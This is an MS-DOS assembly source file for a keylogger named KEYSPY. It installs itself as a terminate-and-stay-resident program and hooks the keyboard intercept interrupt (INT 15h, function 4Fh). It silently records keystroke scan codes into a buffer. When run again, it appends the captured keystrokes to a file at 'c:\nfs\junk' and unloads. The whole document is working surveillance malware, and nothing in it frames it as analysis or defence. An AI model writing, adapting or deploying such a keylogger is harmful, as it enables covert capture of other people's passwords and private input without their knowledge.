ks  segment

       assume cs:ks,ds:ks,es:ks,ss:ks



       org 100h
start: 
       mov ah,0c0h                 ;supports Keyboard Intercept ?
       int 21h
       mov ah,es:[bx]
       test ah,16                  ;No -
       je go4it
                                   ;bleep and return
       mov ax,0e07h
       mov bx,1
       int 10h
       jmp fail

go4it: mov ah,0efh                 ;check for active KEYSPY
       xor bx,bx
       int 15h
       cmp bx,0
       jz  tsrit
      
      mov dx,cs                   ;data addressable
      mov ds,dx
        
      mov oldofs,bx
      mov oldseg,es
      mov oldcnt,cx
      mov dx,offset store         ;open store
      mov ax,3d02h
      int 21h
      jc fail

      mov bx,ax
      mov handle,bx          ;save handle for the fun of it

      mov ax,4202h         ;move to eof
      xor cx,cx
      xor dx,dx
      int 21h
     
      mov ax,4000h           ;write buffer to store
      mov cx,40
      mov bx,handle
      mov dx,oldofs
      mov si,oldseg
      mov ds,si
      int 21h

      mov ax,cs
      mov ds,ax

      mov ah,3eh           ;close file
      mov bx,handle
      int 21h
      
      mov ah,49h                ;release memory
      mov bx,oldseg
      sub bx,16
      mov es,bx
      int 21h
      jmp fail

tsrit: mov ax,3515h
       int 21h
       mov ax,cs
       mov ds,ax              ;save ivec for int15
       mov int9seg,es
       mov int9ofs,bx
       
       mov ax,2515h
       mov dx,seg loop         ;set ivec for int15
       mov ds,dx
       mov dx,offset loop
       int 21h
       
       mov dx,60h
       mov ax,3100h      ;get out (TSR)
       int 21h

fail:  mov ax,4c00h
       int 21h
loop: 
      sti
      push ax 
      push bx
      push cx
      push ds
      push es
      push dx
      
      mov cx,cs            ;data in code segment too!
      mov ds,cx
      


      cmp ah,0efh          ;quit request ?
      jne ck4f
     
;----------------------------------------------------------------------------
      mov ax,2515h         ;hand back controller
      mov dx,int9ofs
      mov ds,int9seg
      int 21h
      
      pop dx
      pop es
      pop ds
      pop cx
      pop bx
      pop ax

      mov bx,cs
      mov es,bx                 ;return to calling process with info
      mov bx,offset buffer
      xor cx,cx
      mov cl,count
      iret 

;--------------------------------------------------------------------------


ck4f: cmp ah,4fh           ;are we in the right sub_function ?
      jne endi
      
      cmp count,40         ;buffer full ?
      jne trap

       
quit: 
      jmp endi

trap: test al,80h          ;key off ?
      jne endi
      
      xor bx,bx            ;store it
      mov bl,count
      mov buffer[bx],al
      inc count
endi: pop dx
      pop es
      pop ds
      pop cx
      pop bx
      pop ax
            db 0eah
int9ofs     dw 0h
int9seg     dw 0h
oldseg      dw 0h
oldofs      dw 0h
oldcnt      dw 0h
count       db 0h
buffer      db 50 dup(0fah)
flag        dw 0dh
store       db "c:\nfs\junk",0,"room for large filename",0
handle      dw 0
ks      ends
          end start
